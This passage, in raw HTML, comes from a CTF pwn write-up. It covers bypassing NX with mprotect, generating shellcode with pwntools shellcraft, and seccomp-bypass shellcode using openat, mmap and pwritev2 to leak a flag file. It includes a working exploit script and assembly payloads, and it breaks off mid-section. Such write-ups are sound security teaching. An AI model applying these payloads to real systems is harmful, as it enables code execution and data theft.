bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAAsTAAALEwEAmpwYAAABb0lEQVQoz42S23KCMBCGoyIgiKLWcBISIJzUaV+i7dTrKuD7P8jfEO3pptOLb3aT3dndP1my9h0kBVWwlCMVDXheIU5z7HiOMOaIuYC/Ywh3CRI2EIOnDEHgYzKZgBDyjaGbqMoauq5jGy3gZw5W1MZU034n/hfLnoHJrmNtBIsSuJxAX96CQ/fxnc/zaDT6u2AURzgc96ibCmnGcHxqIIpMNYl2EbZ0C8/34LpL+NIupR3UGIbxhWmamOpTdU+yPENVV2j2NU6nN/R9j7Zrpe1wPr/jfDnjeu3R9a2kUwyxtr0ohnh/7VTOy+sziBCZnEigKAXqe+GiLNA0NfaHRvm19KuqVHbIGRSJIr/7B6TyMzlniJMYxNtslKQwDOAsHDW+kmIasCxLMoNu3CTOZqaSZdsW7LmtcufzOTTtx09TtkXxyJA2oVyNQK5LIRF48CNsvBCBXBsaJVjTAHS426xBPQp35aqGjuPc3u5e8AMKEc7graZPmgAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/8b78c6b7e6d4f582ad12f45f3bc93042/8ac56/image-20240627012031364.webp 240w,\n/static/8b78c6b7e6d4f582ad12f45f3bc93042/d3be9/image-20240627012031364.webp 480w,\n/static/8b78c6b7e6d4f582ad12f45f3bc93042/632b0/image-20240627012031364.webp 915w\"\n              sizes=\"(max-width: 915px) 100vw, 915px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/8b78c6b7e6d4f582ad12f45f3bc93042/8ff5a/image-20240627012031364.png 240w,\n/static/8b78c6b7e6d4f582ad12f45f3bc93042/e85cb/image-20240627012031364.png 480w,\n/static/8b78c6b7e6d4f582ad12f45f3bc93042/4255a/image-20240627012031364.png 915w\"\n            sizes=\"(max-width: 915px) 100vw, 915px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/8b78c6b7e6d4f582ad12f45f3bc93042/4255a/image-20240627012031364.png\"\n            alt=\"image-20240627012031364\"\n            title=\"image-20240627012031364\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h3 id=\"bypassing-nx-with-mprotect\" style=\"position:relative;\"><a href=\"#bypassing-nx-with-mprotect\" aria-label=\"bypassing nx with mprotect permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Bypassing NX with mprotect</h3>\n<p>So far I’ve been creating simple Shell Code, but when exploiting via ROP, longer Shell Code increases susceptibility to constraints such as limited available gadgets and input byte size restrictions.</p>\n<p>In such cases, rather than constructing a ROP chain, directly executing Shell Code placed on the stack can be an effective workaround.</p>\n<p>However, when NX is enabled as in this challenge binary, placing a payload on the stack does not allow code execution.</p>\n<p>One way to work around this is to use libc’s <code class=\"language-text\">mprotect</code> to assign execute permission to a region and place the Shell Code there.</p>\n<p>Reference: <a href=\"https://sh0ebill.hatenablog.com/entry/2022/10/02/223537\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">SROPとNX enabledの回避 - ポン中のハシビロコウ</a></p>\n<p>For example, the following Shell Code uses <code class=\"language-text\">mprotect</code> to assign execute permission to an arbitrary-sized region starting at a given memory address:</p>\n<div class=\"gatsby-highlight\" data-language=\"nasm\"><pre class=\"language-nasm\"><code class=\"language-nasm\">mov <span class=\"token register variable\">rdx</span>, <span class=\"token number\">7</span> <span class=\"token comment\">; R|W|X</span>\nmov <span class=\"token register variable\">rsi</span>, <span class=\"token number\">0x1000</span> <span class=\"token comment\">; target memory size</span>\nmov <span class=\"token register variable\">rdi</span>, {target_addr}\nmov <span class=\"token register variable\">r15</span>, {mprotect_addr}\npush <span class=\"token register variable\">r15</span>\nret</code></pre></div>\n<p>For testing, use the following script:</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token comment\"># Exploit</span>\nr <span class=\"token operator\">=</span> target<span class=\"token punctuation\">.</span>recvline_startswith<span class=\"token punctuation\">(</span><span class=\"token string\">b\"System:\"</span><span class=\"token punctuation\">)</span>\nsystem_addr <span class=\"token operator\">=</span> <span class=\"token builtin\">int</span><span class=\"token punctuation\">(</span>r<span class=\"token punctuation\">.</span>decode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>split<span class=\"token punctuation\">(</span><span class=\"token string\">\" \"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token number\">1</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span><span class=\"token number\">16</span><span class=\"token punctuation\">)</span>\nr <span class=\"token operator\">=</span> target<span class=\"token punctuation\">.</span>recvline_startswith<span class=\"token punctuation\">(</span><span class=\"token string\">b\"binsh:\"</span><span class=\"token punctuation\">)</span>\nbinsh_addr <span class=\"token operator\">=</span> <span class=\"token builtin\">int</span><span class=\"token punctuation\">(</span>r<span class=\"token punctuation\">.</span>decode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>split<span class=\"token punctuation\">(</span><span class=\"token string\">\" \"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token number\">1</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span><span class=\"token number\">16</span><span class=\"token punctuation\">)</span>\n\nlibc_base <span class=\"token operator\">=</span> system_addr <span class=\"token operator\">-</span> <span class=\"token number\">0x50d70</span>\nmprotect_offset <span class=\"token operator\">=</span> <span class=\"token number\">0x11eaa0</span>\nmprotect_addr <span class=\"token operator\">=</span> libc_base <span class=\"token operator\">+</span> <span class=\"token number\">0x11eaa0</span>\n\nr <span class=\"token operator\">=</span> target<span class=\"token punctuation\">.</span>recvline<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\nshellcode <span class=\"token operator\">=</span> asm<span class=\"token punctuation\">(</span>\n<span class=\"token string-interpolation\"><span class=\"token string\">f\"\"\"mov rdx, 7\nmov rsi, 0x1000\nmov rdi, </span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span><span class=\"token number\">0x555555554000</span><span class=\"token punctuation\">}</span></span><span class=\"token string\">\nmov r15, </span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>mprotect_addr<span class=\"token punctuation\">}</span></span><span class=\"token string\">\npush r15\nret\n\"\"\"</span></span><span class=\"token punctuation\">)</span>\npayload <span class=\"token operator\">=</span> shellcode\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span></code></pre></div>\n<p>Running this confirms that write and execute permissions are granted to the 0x1000-byte region starting at <code class=\"language-text\">0x555555554000</code>:</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/10b870c1f7efdef14750f7f904eee3d5/58fee/image-20240627221454126.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 99.58333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAUCAYAAACNiR0NAAAACXBIWXMAAAsTAAALEwEAmpwYAAADN0lEQVQ4y22U2ZaiQAyGuRqVTZAdBTdcEMVdEWy1e97/mf5JqhuPzszFd1JVVP2VUEmkLJ4hHYwxS1fwgy660UjgBRE0TUWn04HrunAcR8DjGp7btv2GVFxv+Ljdcf244XwucH984vH4wna3F2LD4QjH4xH7/R6n04n2nMW8KAqxtt1usdlsBOv1GlJVlnjc77jdPsTm+/1G4xsdOsCyLCRJgjzPSXgoxuPxWNjpdPqcj0YjAe+RqqoSQmwvl4uAbz8cvgX5wGKxQL/fR6/XQxzHwuq6jkajgWaz+YZUkod1CDV8AYfAIUdRJMR5H6/xXg4zCALIskz/WYOqqk+Eh7Vg7R3PmTrkNE2F8KuHpmkKwVpIURSBVF2vOJFHZxYsKWT2mH4+e8WvNpvNMKB/w+G8HmTPOOx67elheTzhuN3huNvhTCLMgV9uuYJNHvZ7ETb0KGsKlz1dLpfiErZZlonf8uqpVK03OC2WKFc5qtVa2HO2xCnNYFNY47CLfDZHMpmIV+RH4geqX9gwjHcPD3O6lTYn0wkmdHNC6TAYj0gggUW3B2FIid77TlzymC2v14nMYb8Jen4IxvG6cJ0AvhsicAO4wRBOdwDL9aArOjRVR0vTIdO/k/W2CFOWW0+x2kpty0REAokfITE9RDqVlGbDsHtoeSFUm1LHCuFaHhTXhurY0DyXHoUe5C8xIZhOc+jmDLKxgtZJEPdHGCRzaIYPRXUIE02iRShKTYdgAeXHvuRhcSmgujs0nAq6u0C+SrGnOjbNtgiJDwlPhBc18ouY8i64o8OyvcYvq4DuZFhlc6RUapy4Si2i/IvCArV9FZxnOQJvAMOcou30EfS7lG+UgzaFrJlQ/0vnTeRNMI7WiOIcfi9HaDpod0w0ZA1NgkOSiaasoKV8I8YyW5nsv0gLb4zU6yOlRjtwfEz9GBMvwtAJYVC4bttAbHbQNSgbiJgbBlta65EN6TvT/RlLH2WBL+qBn9cKFdX0F/XC39QfD9uNSOQx9bmSa51K8nI6P7lSI+E1LlkuVWZH5SndqFvfHw88Pj9RUudhy/OCDlhUCVOqHn4kbvfcsvwfeOz5PuHB875xiT+AwBmV3zlEtwAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/10b870c1f7efdef14750f7f904eee3d5/8ac56/image-20240627221454126.webp 240w,\n/static/10b870c1f7efdef14750f7f904eee3d5/d3be9/image-20240627221454126.webp 480w,\n/static/10b870c1f7efdef14750f7f904eee3d5/e46b2/image-20240627221454126.webp 960w,\n/static/10b870c1f7efdef14750f7f904eee3d5/42749/image-20240627221454126.webp 1051w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/10b870c1f7efdef14750f7f904eee3d5/8ff5a/image-20240627221454126.png 240w,\n/static/10b870c1f7efdef14750f7f904eee3d5/e85cb/image-20240627221454126.png 480w,\n/static/10b870c1f7efdef14750f7f904eee3d5/d9199/image-20240627221454126.png 960w,\n/static/10b870c1f7efdef14750f7f904eee3d5/58fee/image-20240627221454126.png 1051w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/10b870c1f7efdef14750f7f904eee3d5/d9199/image-20240627221454126.png\"\n            alt=\"image-20240627221454126\"\n            title=\"image-20240627221454126\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h3 id=\"generating-shell-code-with-shellcraft\" style=\"position:relative;\"><a href=\"#generating-shell-code-with-shellcraft\" aria-label=\"generating shell code with shellcraft permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Generating Shell Code with shellcraft</h3>\n<p>So far I’ve been handcrafting Shell Code, but pwntools’ <code class=\"language-text\">shellcraft</code> can generate equivalent Shell Code.</p>\n<p>For example, the following code easily generates Shell Code that uses <code class=\"language-text\">getdents64</code> for directory enumeration:</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> pwn <span class=\"token keyword\">import</span> <span class=\"token operator\">*</span>\n\nopen_asm <span class=\"token operator\">=</span> shellcraft<span class=\"token punctuation\">.</span>linux<span class=\"token punctuation\">.</span><span class=\"token builtin\">open</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"/tmp/\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span>\ngetdents64_asm <span class=\"token operator\">=</span> shellcraft<span class=\"token punctuation\">.</span>linux<span class=\"token punctuation\">.</span>getdents64<span class=\"token punctuation\">(</span><span class=\"token string\">\"rax\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"rsp\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x1000</span><span class=\"token punctuation\">)</span>\nwrite_asm <span class=\"token operator\">=</span> shellcraft<span class=\"token punctuation\">.</span>linux<span class=\"token punctuation\">.</span>write<span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"rsp\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x1000</span><span class=\"token punctuation\">)</span>\n\nshellcode <span class=\"token operator\">=</span> asm<span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f'''\n</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>open_asm<span class=\"token punctuation\">}</span></span><span class=\"token string\">\n</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>getdents64_asm<span class=\"token punctuation\">}</span></span><span class=\"token string\">\n</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>write_asm<span class=\"token punctuation\">}</span></span><span class=\"token string\">\n'''</span></span><span class=\"token punctuation\">)</span></code></pre></div>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 801px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/6e6fb3bfef6eed8fd63f77ddf586301b/2ad15/image-20240628001443875.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 44.99999999999999%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAAByklEQVQoz4WS227aQBCG1wYVsJ1AwNjGYNbnE+aYvkZbKVV6m0jNkd6kL1GggV6kV83L/t2dRFUvKvXi0/w7Hv2zsx5mjo7hFT1E0wF4ZiNMckT5HEFSIkhL+CLyOAdPCtIujxDEGdI0RpxESNJE6ASdkw4YY2AKU5EmGRxrAN3QEOYuhlEXztCEoWuoqQrq9RrqNZWovaIoClRVFSikyewFhiD00Wq2wN4wtFwGfcSgauzvov8iTcn46NhAGAWwbRumfQKHd2n0br8NXdfR7rShaRrpZrNBtzWODDQajX+b920LfsCR5Sl8n8PzxkiSFGM+xqQqURS5aBgizVKRj4kszxCGAbio56JO1npjjzQ7/3SOh68PuLm5xvrL+g/36ztsd1s8P//C088nbDbfcPhxwH7/iMdXdt93FLfbDfaHPWl29vEMF5cXuL27JaNrYXx19ZkayPyl4P2Hd1gs55gvZpjOKmJSTXD6doXV6ZJuL+NytQCzHQv9volIjPWyBjHyIkNR5vQMUkukSTkpKS+Ro0uDalphNp+SORnKt5AJaWQK415PrMzAwWg0FD9KNLP6sATymyXOjmNT3h26Im+RljtomiZcd4DfYxoGfNk7eBoAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/6e6fb3bfef6eed8fd63f77ddf586301b/8ac56/image-20240628001443875.webp 240w,\n/static/6e6fb3bfef6eed8fd63f77ddf586301b/d3be9/image-20240628001443875.webp 480w,\n/static/6e6fb3bfef6eed8fd63f77ddf586301b/99a1d/image-20240628001443875.webp 801w\"\n              sizes=\"(max-width: 801px) 100vw, 801px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/6e6fb3bfef6eed8fd63f77ddf586301b/8ff5a/image-20240628001443875.png 240w,\n/static/6e6fb3bfef6eed8fd63f77ddf586301b/e85cb/image-20240628001443875.png 480w,\n/static/6e6fb3bfef6eed8fd63f77ddf586301b/2ad15/image-20240628001443875.png 801w\"\n            sizes=\"(max-width: 801px) 100vw, 801px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/6e6fb3bfef6eed8fd63f77ddf586301b/2ad15/image-20240628001443875.png\"\n            alt=\"image-20240628001443875\"\n            title=\"image-20240628001443875\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Shell Code to read and output file contents can also be generated with the following script:</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> pwn <span class=\"token keyword\">import</span> <span class=\"token operator\">*</span>\n\nopen_asm <span class=\"token operator\">=</span> shellcraft<span class=\"token punctuation\">.</span>linux<span class=\"token punctuation\">.</span>openat<span class=\"token punctuation\">(</span><span class=\"token string\">\"/tmp/flag_in_tmp.txt\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span>\nread_asm <span class=\"token operator\">=</span> shellcraft<span class=\"token punctuation\">.</span>linux<span class=\"token punctuation\">.</span>read<span class=\"token punctuation\">(</span><span class=\"token string\">\"rax\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"rsp\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">20</span><span class=\"token punctuation\">)</span>\nwrite_asm <span class=\"token operator\">=</span> shellcraft<span class=\"token punctuation\">.</span>linux<span class=\"token punctuation\">.</span>write<span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"rsp\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">20</span><span class=\"token punctuation\">)</span>\n\nshellcode <span class=\"token operator\">=</span> asm<span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f'''\n</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>open_asm<span class=\"token punctuation\">}</span></span><span class=\"token string\">\n</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>read_asm<span class=\"token punctuation\">}</span></span><span class=\"token string\">\n</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>write_asm<span class=\"token punctuation\">}</span></span><span class=\"token string\">\n'''</span></span><span class=\"token punctuation\">)</span></code></pre></div>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 764px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/606b74449b17023c2d3cbc2271effde7/f3c12/image-20240628001908809.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 33.33333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABJElEQVQoz5VQ246CMBRsoQW8IbdFQWhRFGhB3Wz2/39ttsWsycYHsw+TmdP2TOccUqsE3VeJy2eJY3dEO9wxXL+N1mjVDa2+Q14UzoZt3Vw0RNujHwaMkzbcQY8KSitEUQQiKglRS7gOR3OuIE4707BDsc+xCHww5oAzd4bv8admjMF13SccxwEhBEQ2AkVZzMVyRxBkD6acPB78F1VdYbVagToE2wNHJBiShsNlFJSadJzD8z34vg/PJLRpPM+bQSl9NexVh9v9ikH1qEWF5iShpwHZRwYpBfbFHmG4QZzECLchFosAidH23n72YjhOE47tCdN1RJ7nyLIUaZricCiRGr3ZGLM4NmcJgiB4P/JyvZ6FjW8X/btsOxLj7M+IVr8z/AE56qI9SgP2swAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/606b74449b17023c2d3cbc2271effde7/8ac56/image-20240628001908809.webp 240w,\n/static/606b74449b17023c2d3cbc2271effde7/d3be9/image-20240628001908809.webp 480w,\n/static/606b74449b17023c2d3cbc2271effde7/79237/image-20240628001908809.webp 764w\"\n              sizes=\"(max-width: 764px) 100vw, 764px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/606b74449b17023c2d3cbc2271effde7/8ff5a/image-20240628001908809.png 240w,\n/static/606b74449b17023c2d3cbc2271effde7/e85cb/image-20240628001908809.png 480w,\n/static/606b74449b17023c2d3cbc2271effde7/f3c12/image-20240628001908809.png 764w\"\n            sizes=\"(max-width: 764px) 100vw, 764px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/606b74449b17023c2d3cbc2271effde7/f3c12/image-20240628001908809.png\"\n            alt=\"image-20240628001908809\"\n            title=\"image-20240628001908809\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Both work the same way as handmade Shell Code, and payloads can be generated very easily.</p>\n<p>This feature is extremely convenient, but since our goal is not to be script kiddies, I’ll try not to over-rely on it.</p>\n<h3 id=\"other-shell-code-samples\" style=\"position:relative;\"><a href=\"#other-shell-code-samples\" aria-label=\"other shell code samples permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Other Shell Code Samples</h3>\n<ul>\n<li>Code that bypasses seccomp filters using <code class=\"language-text\">openat</code>, <code class=\"language-text\">mmap</code>, and <code class=\"language-text\">pwritev2</code> (in some cases <code class=\"language-text\">preadv2</code> can be used instead of <code class=\"language-text\">mmap</code>):</li>\n</ul>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\">shellcode <span class=\"token operator\">=</span> shellcraft<span class=\"token punctuation\">.</span>pushstr<span class=\"token punctuation\">(</span><span class=\"token string\">\"/home/user/flag.txt\"</span><span class=\"token punctuation\">)</span>\nshellcode <span class=\"token operator\">+=</span> shellcraft<span class=\"token punctuation\">.</span>openat<span class=\"token punctuation\">(</span><span class=\"token number\">0</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"rsp\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span>\nshellcode <span class=\"token operator\">+=</span> shellcraft<span class=\"token punctuation\">.</span>mmap<span class=\"token punctuation\">(</span><span class=\"token number\">0</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x1000</span><span class=\"token punctuation\">,</span> constants<span class=\"token punctuation\">.</span>PROT_READ<span class=\"token punctuation\">,</span> constants<span class=\"token punctuation\">.</span>MAP_PRIVATE<span class=\"token punctuation\">,</span> <span class=\"token string\">\"rax\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span>\nshellcode <span class=\"token operator\">+=</span> shellcraft<span class=\"token punctuation\">.</span>push<span class=\"token punctuation\">(</span><span class=\"token number\">0x100</span><span class=\"token punctuation\">)</span>\nshellcode <span class=\"token operator\">+=</span> shellcraft<span class=\"token punctuation\">.</span>push<span class=\"token punctuation\">(</span><span class=\"token string\">\"rax\"</span><span class=\"token punctuation\">)</span>\nshellcode <span class=\"token operator\">+=</span> shellcraft<span class=\"token punctuation\">.</span>pwritev2<span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"rsp\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">1</span><span class=\"token punctuation\">,</span> <span class=\"token operator\">-</span><span class=\"token number\">1</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span>\n\ncode<span class=\"token operator\">=</span><span class=\"token triple-quoted-string string\">\"\"\"\nlea rsi, [rip+filename]\nmov rdi, 0\nxor rdx, rdx\nmov rax, 257\nsyscall\n\n// mmap(addr=0, length=0x1000, prot=PROT_READ (1), flags=MAP_PRIVATE (2), fd='rax', offset=0)\npush 2\npop r10\nmov r8, rax\nxor r9, r9\nxor edi, edi\nmov rdx, 1\nmov rsi, 4096\npush 9\npop rax\nsyscall\n\n/* pwritev2(vararg_0=1, vararg_1='rsp', vararg_2=1, vararg_3=-1, vararg_4=0) */\npush 0x100\npush rax\nmov r10, -1\nxor r8, r8\nmov rdi, 1\nmov rsi, rsp\nmov rdx, rdi\nmov rax, 328\nsyscall\n\nfilename:\n    .string \"/home/user/flag.txt\"\n\"\"\"</span></code></pre></div>\n<p>Reference: <a href=\"/ctf-uiuctf-2024-en\">UIU CTF 2024</a></p>\n<h2 id=\"solution-1-output-file-data-and-retrieve-the-flag\" style=\"position:relative;\"><a href=\"#solution-1-output-file-data-and-retrieve-the-flag\" aria-label=\"solution 1 output file data and retrieve the flag permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Solution 1: Output File Data and Retrieve the Flag</h2>\n<p>Now that I’ve organized the seccomp bypass and Shell Code knowledge, let’s finally retrieve the Flag.</p>\n<p>For this challenge binary, the steps needed to get the Flag are:</p>\n<p>Since <code class=\"language-text\">execve</code> and <code class=\"language-text\">execveat</code> are blocked by seccomp, the strategy is to leak file data rather than obtaining a shell.</p>\n<ol>\n<li>Identify the correct file name of the Flag created at <code class=\"language-text\">/app/ctf4b/flag-$(md5sum /flag.txt | awk '{print $1}').txt</code>.</li>\n<li>Read the Flag text from the file and leak it via stdout.</li>\n</ol>\n<p>Both steps can be achieved by combining the Shell Code techniques covered so far.</p>\n<p>However, running all the code as a ROP chain is quite laborious, so I’ll embed the execution code as Shell Code and use <code class=\"language-text\">mprotect</code> to grant execute permission.</p>\n<h3 id=\"granting-execute-permission-with-mprotect\" style=\"position:relative;\"><a href=\"#granting-execute-permission-with-mprotect\" aria-label=\"granting execute permission with mprotect permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Granting Execute Permission with mprotect</h3>\n<p>In this challenge, we can retrieve the Flag by first using <code class=\"language-text\">getdents</code> to identify the file name containing the Flag, then using <code 